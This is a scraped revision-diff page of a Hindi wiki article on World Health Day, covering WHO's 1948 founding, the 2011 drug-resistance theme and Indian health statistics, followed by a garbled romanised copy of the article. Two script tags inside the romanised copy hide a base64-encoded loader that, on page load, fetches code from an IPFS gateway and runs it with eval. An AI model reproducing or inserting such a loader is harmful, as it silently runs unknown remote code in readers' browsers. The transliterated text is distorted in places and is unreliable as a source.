Difference between revisions of "विश्व स्वास्थ्य दिवस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " हजार " to " हज़ार ")
Line 1: Line 1:
 
{{पुनरीक्षण}}
 
{{पुनरीक्षण}}
==परिचय==
+
[[चित्र:whd.gif|thumb|300px|विश्व स्वास्थ्य दिवस]]
[[चित्र:whd.gif|thumb|300px|विश्व स्वास्थ्य दिवस<br />World Health Day]]
+
{{tocright}}
विश्व स्वास्थ्य संगठन (WHO: World Health Organisation) के तत्वावधान में हर साल इसके स्थापना दिवस पर 7 अप्रैल को पूरी दुनिया में विश्व स्वास्थ्य दिवस (World Health Day) मनाया जाता है। इसका मकसद दुनियाभर में लोगों को स्वास्थ्य के प्रति जागरूक करना और जनहित को ध्यान में रखते हुए सरकार को स्वास्थ्य नीतियों के निर्माण के लिए प्रेरित करना है।
+
'''विश्व स्वास्थ्य दिवस''' ([[अंग्रेज़ी भाषा|अंग्रेज़ी]]: World Health Day) विश्व स्वास्थ्य संगठन (WHO: World Health Organisation) के तत्वावधान में हर साल इसके स्थापना दिवस पर [[7 अप्रैल]] को पूरी विश्व में मनाया जाता है। इसका मकसद दुनियाभर में लोगों को स्वास्थ्य के प्रति जागरूक करना और जनहित को ध्यान में रखते हुए सरकार को स्वास्थ्य नीतियों के निर्माण के लिए प्रेरित करना है।
  
 
==इतिहास==
 
==इतिहास==
विश्व स्वास्थ्य दिवस मनाने की शुरुआत 1950 से हुई। इससे पहले 1948 में सात अप्रैल को ही डब्ल्यूएचओ की स्थापना हुई थी। उसी साल डब्ल्यूएचओ की पहली विश्व स्वास्थ्य सभा हुई, जिसमें सात अप्रैल से हर साल विश्व स्वास्थ्य दिवस मनाने का फैसला लिया गया।  
+
विश्व स्वास्थ्य दिवस मनाने की शुरुआत [[1950]] से हुई। इससे पहले [[1948]] में सात अप्रैल को ही डब्ल्यूएचओ की स्थापना हुई थी। उसी साल डब्ल्यूएचओ की पहली विश्व स्वास्थ्य सभा हुई, जिसमें सात अप्रैल से हर साल विश्व स्वास्थ्य दिवस मनाने का फैसला लिया गया।  
  
 
==विश्व स्वास्थ्य संगठन==
 
==विश्व स्वास्थ्य संगठन==
Line 11: Line 11:
  
 
==विश्व स्वास्थ्य दिवस 2011==
 
==विश्व स्वास्थ्य दिवस 2011==
विश्व स्वास्थ्य दिवस 2011 के लिए रोगाणुरोधी प्रतिरोध: आज कार्रवाई नहीं, कल इलाज नहीं (Antimicrobial resistance: no action today, no cure tomorrow) थीम रखा गया। रोगाणुरोधी प्रतिरोध (Antimicrobial resistance) को औषध प्रतिरोध (Drug Resistance) भी कहा जाता है। इसी कारण विश्व स्वास्थ्य दिवस 2011 का थीम औषध प्रतिरोध: आज कार्रवाई नहीं, कल इलाज नहीं (Combat Drug Resistance: no action today, no cure tomorrow) भी है।  
+
विश्व स्वास्थ्य दिवस [[2011]] के लिए रोगाणुरोधी प्रतिरोध: आज कार्रवाई नहीं, कल इलाज नहीं (Antimicrobial resistance: no action today, no cure tomorrow) थीम रखा गया। रोगाणुरोधी प्रतिरोध (Antimicrobial resistance) को औषध प्रतिरोध (Drug Resistance) भी कहा जाता है। इसी कारण विश्व स्वास्थ्य दिवस 2011 का थीम औषध प्रतिरोध: आज कार्रवाई नहीं, कल इलाज नहीं (Combat Drug Resistance: no action today, no cure tomorrow) भी है।  
 +
==भारत में स्वास्थ्य आकङे==
 
[[चित्र:stamp whd.jpg|thumb|300px|भारतीय डाकटिकट में विश्व स्वास्थ्य दिवस]]
 
[[चित्र:stamp whd.jpg|thumb|300px|भारतीय डाकटिकट में विश्व स्वास्थ्य दिवस]]
 
+
[[भारत]] ने पिछले कुछ सालों में तेजी के साथ आर्थिक विकास किया है लेकिन इस विकास के बावजूद बड़ी संख्या में लोग कुपोषण के शिकार हैं जो भारत के स्वास्थ्य परिदृश्य के प्रति चिंता उत्पन्न करता है।
==भारत में स्वास्थ्य आकङे==
 
भारत ने पिछले कुछ सालों में तेजी के साथ आर्थिक विकास किया है लेकिन इस विकास के बावजूद बड़ी संख्या में लोग कुपोषण के शिकार हैं जो भारत के स्वास्थ्य परिदृश्य के प्रति चिंता उत्पन्न करता है।
 
  
 
राष्ट्रीय परिवार स्वास्थ्य सर्वेक्षण के अनुसार तीन वर्ष की अवस्था वाले 3.88 प्रतिशत बच्चों का विकास अपनी उम्र के हिसाब से नहीं हो सका है और 46 प्रतिशत बच्चे अपनी अवस्था की तुलना में कम वजन के हैं जबकि 79.2 प्रतिशत बच्चे एनीमिया से पीड़ित हैं। गर्भवती महिलाओं में एनीमिया 50 से 58 प्रतिशत बढ़ा है।
 
राष्ट्रीय परिवार स्वास्थ्य सर्वेक्षण के अनुसार तीन वर्ष की अवस्था वाले 3.88 प्रतिशत बच्चों का विकास अपनी उम्र के हिसाब से नहीं हो सका है और 46 प्रतिशत बच्चे अपनी अवस्था की तुलना में कम वजन के हैं जबकि 79.2 प्रतिशत बच्चे एनीमिया से पीड़ित हैं। गर्भवती महिलाओं में एनीमिया 50 से 58 प्रतिशत बढ़ा है।
  
कहा जाता है बेहतर स्वास्थ्य से आयु बढ़ती है। इस स्तर पर देखें तो बांग्लादेश भारत से आगे है। भारत में औसत आयु जहां 64.6 वर्ष मानी गई है वहीं बांग्लादेश में यह 66.9 वर्ष है।
+
कहा जाता है बेहतर स्वास्थ्य से आयु बढ़ती है। इस स्तर पर देखें तो [[बांग्लादेश]] भारत से आगे है। भारत में औसत आयु जहां 64.6 वर्ष मानी गई है वहीं बांग्लादेश में यह 66.9 वर्ष है।
  
 
इसके अलावा भारत में कम वजन वाले बच्चों का अनुपात 43.5 प्रतिशत है और प्रजनन क्षमता की दर 2.7 प्रतिशत है। जबकि पांच वर्षो से कम अवस्था वाले बच्चों की मृत्यु दर 66 है और शिशु मृत्यु दर जन्म लेने वाले प्रति हज़ार बच्चों में 41 है। जबकि 66 प्रतिशत बच्चों को डीपीटी का टीका देना पड़ता है।
 
इसके अलावा भारत में कम वजन वाले बच्चों का अनुपात 43.5 प्रतिशत है और प्रजनन क्षमता की दर 2.7 प्रतिशत है। जबकि पांच वर्षो से कम अवस्था वाले बच्चों की मृत्यु दर 66 है और शिशु मृत्यु दर जन्म लेने वाले प्रति हज़ार बच्चों में 41 है। जबकि 66 प्रतिशत बच्चों को डीपीटी का टीका देना पड़ता है।
  
इंडिया हेल्थ रिपोर्ट 2010 के मुताबिक सार्वजनिक स्वास्थ्य की सेवाएं अभी भी पूरी तरह से मुफ़्त नहीं हैं और जो हैं उनकी हालत अच्छी नहीं हैं। स्वास्थ्य के क्षेत्र में प्रशिक्षित लोगों की काफ़ी कमी है। भारत में डॉक्टर और आबादी का अनुपात भी संतोषजनक नहीं है। 1000 लोगों पर एक डॉक्टर भी नहीं है। अस्पतालों में बिस्तर की उपलब्धता भी काफ़ी कम है। केवल 28 प्रतिशत लोग ही बेहतर साफ-सफाई का ध्यान रखते हैं।
+
''इंडिया हेल्थ रिपोर्ट'' [[2010]] के मुताबिक सार्वजनिक स्वास्थ्य की सेवाएं अभी भी पूरी तरह से मुफ़्त नहीं हैं और जो हैं उनकी हालत अच्छी नहीं हैं। स्वास्थ्य के क्षेत्र में प्रशिक्षित लोगों की काफ़ी कमी है। भारत में डॉक्टर और आबादी का अनुपात भी संतोषजनक नहीं है। 1000 लोगों पर एक डॉक्टर भी नहीं है। अस्पतालों में बिस्तर की उपलब्धता भी काफ़ी कम है। केवल 28 प्रतिशत लोग ही बेहतर साफ-सफाई का ध्यान रखते हैं।
  
पिछले कुछ सालों में यहां एचआईवी एड्स तथा कैंसर जैसी जानलेवा बीमारियों का प्रभाव बढ़ा है। साथ ही डायबिटीज, हृदय रोग, टीबी, मोटापा, तनाव की चपेट में भी लोग बड़ी संख्या में आ रहे हैं। महिलाओं में स्तन कैंसर, गर्भाशय कैंसर का खतरा बढ़ा है। ये बीमारियां बड़ी तादाद में उनकी मौत का कारण बन रही हैं।
+
पिछले कुछ सालों में यहां एचआईवी एड्स तथा कैंसर जैसी जानलेवा बीमारियों का प्रभाव बढ़ा है। साथ ही [[मधुमेह|डायबिटीज]], हृदय रोग, टीबी, मोटापा, तनाव की चपेट में भी लोग बड़ी संख्या में आ रहे हैं। महिलाओं में स्तन कैंसर, गर्भाशय कैंसर का खतरा बढ़ा है। ये बीमारियां बड़ी तादाद में उनकी मौत का कारण बन रही हैं।
  
 
ग्रामीण तबके में देश की अधिकतर आबादी उचित खानपान के अभाव में कुपोषण की शिकार है। महिलाओं, बच्चों में कुपोषण का स्तर अधिक देखा गया है। एक रिपोर्ट के अनुसार प्रति 10 में से सात बच्चे एनीमिया से पीड़ित हैं। वहीं, महिलाओं की 36 प्रतिशत आबादी कुपोषण की शिकार हैं।
 
ग्रामीण तबके में देश की अधिकतर आबादी उचित खानपान के अभाव में कुपोषण की शिकार है। महिलाओं, बच्चों में कुपोषण का स्तर अधिक देखा गया है। एक रिपोर्ट के अनुसार प्रति 10 में से सात बच्चे एनीमिया से पीड़ित हैं। वहीं, महिलाओं की 36 प्रतिशत आबादी कुपोषण की शिकार हैं।
  
 +
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{अंतर्राष्ट्रीय विश्व दिवस}}
 +
[[Category:अंतर्राष्ट्रीय विश्व दिवस]]
 +
[[Category:महत्त्वपूर्ण_दिवस]]
 
__INDEX__
 
__INDEX__
[[Category:महत्त्वपूर्ण_दिवस]]
 

Revision as of 06:17, 5 April 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

thumb|300px|vishv svasthy divas

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vishv svasthy divas (aangrezi: World Health Day) vishv svasthy sangathan (WHO: World Health Organisation) ke tatvavadhan mean har sal isake sthapana divas par 7 aprail ko poori vishv mean manaya jata hai. isaka makasad duniyabhar mean logoan ko svasthy ke prati jagarook karana aur janahit ko dhyan mean rakhate hue sarakar ko svasthy nitiyoan ke nirman ke lie prerit karana hai.

itihas

vishv svasthy divas manane ki shuruat 1950 se huee. isase pahale 1948 mean sat aprail ko hi dablyooecho ki sthapana huee thi. usi sal dablyooecho ki pahali vishv svasthy sabha huee, jisamean sat aprail se har sal vishv svasthy divas manane ka phaisala liya gaya.

vishv svasthy sangathan

san 1948 mean aj hi ke din sanyukt rashtr sangh ki ek any sahayogi aur sanbaddh sanstha ke roop mean duniya ke 193 deshoan ne mil kar svitzaralaiand ke jeneva mean vishv svasthy sangathan (WHO) ki nivan rakhi thi. isaka mukhy uddeshy duniya bhar ke logoan ke svasthy ke star ooancha ko uthana hai. har iansan ka svasthy achchha ho aur bimar hone par har vyakti ko achchhe prakar ke ilaj ki achchhi suvidha mil sake. duniya bhar mean poliyo, raktalpata, netrahinata, kushth, ti.bi., maleriya aur eds jaisi bhayanak bimariyoan ki rokatham ho sake aur marijoan ko samuchit ilaj ki suvidha mil sake, aur in samaj ko bimariyoan ke prati jagarook banaya jae aur unako svasth vatavaran bana kar svasth rahana sikhaya jae. vishv svasthy sangathan ke anusar sharirik, manasik aur samajik roop se poorn svasth hona hi manav-svasthy ki paribhasha hai.

vishv svasthy divas 2011

vishv svasthy divas 2011 ke lie roganurodhi pratirodh: aj karravaee nahian, kal ilaj nahian (Antimicrobial resistance: no action today, no cure tomorrow) thim rakha gaya. roganurodhi pratirodh (Antimicrobial resistance) ko aushadh pratirodh (Drug Resistance) bhi kaha jata hai. isi karan vishv svasthy divas 2011 ka thim aushadh pratirodh: aj karravaee nahian, kal ilaj nahian (Combat Drug Resistance: no action today, no cure tomorrow) bhi hai.

bharat mean svasthy akane

thumb|300px|bharatiy dakatikat mean vishv svasthy divas bharat ne pichhale kuchh saloan mean teji ke sath arthik vikas kiya hai lekin is vikas ke bavajood b di sankhya mean log kuposhan ke shikar haian jo bharat ke svasthy paridrishy ke prati chianta utpann karata hai.

rashtriy parivar svasthy sarvekshan ke anusar tin varsh ki avastha vale 3.88 pratishat bachchoan ka vikas apani umr ke hisab se nahian ho saka hai aur 46 pratishat bachche apani avastha ki tulana mean kam vajan ke haian jabaki 79.2 pratishat bachche enimiya se pi dit haian. garbhavati mahilaoan mean enimiya 50 se 58 pratishat badha hai.

kaha jata hai behatar svasthy se ayu badhati hai. is star par dekhean to baangladesh bharat se age hai. bharat mean ausat ayu jahaan 64.6 varsh mani gee hai vahian baangladesh mean yah 66.9 varsh hai.

isake alava bharat mean kam vajan vale bachchoan ka anupat 43.5 pratishat hai aur prajanan kshamata ki dar 2.7 pratishat hai. jabaki paanch varsho se kam avastha vale bachchoan ki mrityu dar 66 hai aur shishu mrityu dar janm lene vale prati hazar bachchoan mean 41 hai. jabaki 66 pratishat bachchoan ko dipiti ka tika dena p data hai.

iandiya helth riport 2010 ke mutabik sarvajanik svasthy ki sevaean abhi bhi poori tarah se muft nahian haian aur jo haian unaki halat achchhi nahian haian. svasthy ke kshetr mean prashikshit logoan ki kafi kami hai. bharat mean d aauktar aur abadi ka anupat bhi santoshajanak nahian hai. 1000 logoan par ek d aauktar bhi nahian hai. aspataloan mean bistar ki upalabdhata bhi kafi kam hai. keval 28 pratishat log hi behatar saph-saphaee ka dhyan rakhate haian.

pichhale kuchh saloan mean yahaan echaeevi eds tatha kaiansar jaisi janaleva bimariyoan ka prabhav badha hai. sath hi dayabitij, hriday rog, tibi, motapa, tanav ki chapet mean bhi log b di sankhya mean a rahe haian. mahilaoan mean stan kaiansar, garbhashay kaiansar ka khatara badha hai. ye bimariyaan b di tadad mean unaki maut ka karan ban rahi haian.

gramin tabake mean desh ki adhikatar abadi uchit khanapan ke abhav mean kuposhan ki shikar hai. mahilaoan, bachchoan mean kuposhan ka star adhik dekha gaya hai. ek riport ke anusar prati 10 mean se sat bachche enimiya se pi dit haian. vahian, mahilaoan ki 36 pratishat abadi kuposhan ki shikar haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

  1. REDIRECT saancha:mahattvapoorn aantararashtriy divas